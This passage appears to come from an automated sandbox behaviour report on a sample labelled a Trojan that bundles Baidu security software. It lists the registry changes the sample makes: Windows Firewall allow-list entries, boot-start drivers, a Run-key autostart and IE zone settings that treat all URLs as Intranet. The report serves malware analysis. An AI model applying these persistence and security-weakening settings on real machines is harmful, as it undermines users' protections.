"BaiduAnBugRpt.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnBugRpt.exe:*:Enabled:百度卫士BUG上报程序"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnSvc.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnSvc.exe:*:Enabled:百度卫士服务程序"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnUpdate.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnUpdate.exe:*:Enabled:百度卫士更新程序"

"BaiduAnSvc.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnSvc.exe:*:Enabled:百度卫士服务程序"

"BaiduAnTray.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe:*:Enabled:百度卫士托盘程序"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAn.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAn.exe:*:Enabled:百度卫士主程序"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

The process %original file name%.exe:716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 78 53 70 87 26 E8 93 7C BE 9E 3F 48 76 5E 65"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"setup.exe" = "baidu Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process BaiduSdTray.exe:2844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 FC 50 8F 1A CD 23 78 1B 66 11 7F A4 D9 01 9C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID]
"{15DEE173-1BE9-4424-81E0-58A87076E9B1}" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "百度异常报告程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process BaiduAnTray.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 3D DB 36 23 4D B8 9A C9 65 30 30 E0 20 F2 01"

The process setup.exe:1056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 EA 07 A3 20 F9 4F F9 B0 58 B4 92 4C 57 69 0E"

The process cacls.exe:1860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 F2 12 B7 FD 64 89 B9 B7 AE BD E7 1E BF F9 32"

The process MsiExec.exe:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 46 D1 8C 7D 67 FF 53 C9 D9 2A 62 5C 76 19 05"

The process MsiExec.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 24 C3 48 CD 4B 0E F9 0D 18 C7 9A 77 37 68 D5"

The process BaiduAnBugRpt.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 3C 86 26 7C 1C 08 2C 01 8E 8C D5 40 04 2E F6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process BDASWDeskGuide.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 90 64 2D C6 DB FA 11 12 56 48 44 31 AE 6D 28"

The process baiduanTray.exe:3012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 3F AC CC F2 8B DE 80 3F E4 AE 38 22 BE 7B BC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\3.0.0.3971]
"BaiduAnBugRpt.exe" = "百度卫士异常报告程序"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"PAUTime" = "1800000"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process BindEx.exe:1568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 73 0F 4B 1E C7 02 FB 9E F2 DE C5 B8 BE F6 87"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]

The process BindEx.exe:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"F1023_s_30803.exe" = "百度杀毒安装程序"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"G1023_s_70904.exe" = "百度卫士安装程序"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 CC E4 19 CB 4A 8C C9 BA 1B 43 AC F1 C5 2A 84"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9319"
"SHELL32.dll,-9217"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216"

The process setup.tmp:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"NoRepair" = "1"
"QuietUninstallString" = "%Program Files%\baidu\unins000.exe /SILENT"

"DisplayVersion" = "1.5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Selected Tasks" = "startup,bind1"
"Inno Setup: Icon Group" = "baidu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"MinorVersion" = "5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Deselected Tasks" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"InstallDate" = "20141106"
"DisplayName" = "baidu version 1.5"
"UninstallString" = "%Program Files%\baidu\unins000.exe"
"Inno Setup: User" = "%CurrentUserName%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\baidu]
"BindEx.exe" = "BindEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Language" = "english"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 27 89 69 F4 4C 37 EB 05 44 47 DD 12 31 25 4B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: App Path" = "%Program Files%\baidu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Setup Version" = "5.5.3 (a)"
"InstallLocation" = "%Program Files%\baidu\"
"MajorVersion" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"baidu" = "%Program Files%\baidu\BindEx.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process regsvr32.exe:2652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D6 47 F1 94 FF 73 43 F8 6A 8D DE B3 72 87 EC"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

The process regsvr32.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\BDSWShellExt.BDSWShellExtMenu]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\TypeLib]
"(Default)" = "{70891BDB-3BE3-45A9-96B6-184ABA962091}"

[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "PSFactoryBuffer"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"

[HKCR\BDSWShellExt.BDSWShellExtMenu\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\NumMethods]
"(Default)" = "3"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\ProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"

[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"
"ThreadingModel" = "Both"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "IBDSWShellExtMenu"

[HKCR\BDSWShellExt.BDSWShellExtMenu.1\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\ProxyStubClsid32]
"(Default)" = "{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\AppID\{A8B81847-1462-4756-9D4A-F506BC5361CD}]
"(Default)" = "BDSWShellExt"

[HKCR\*\shellex\ContextMenuHandlers\ABDSWShellExt]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\AppID\BDSWShellExt.DLL]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"

[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0]
"(Default)" = "BDSWShellExt 1.0 Type Library"

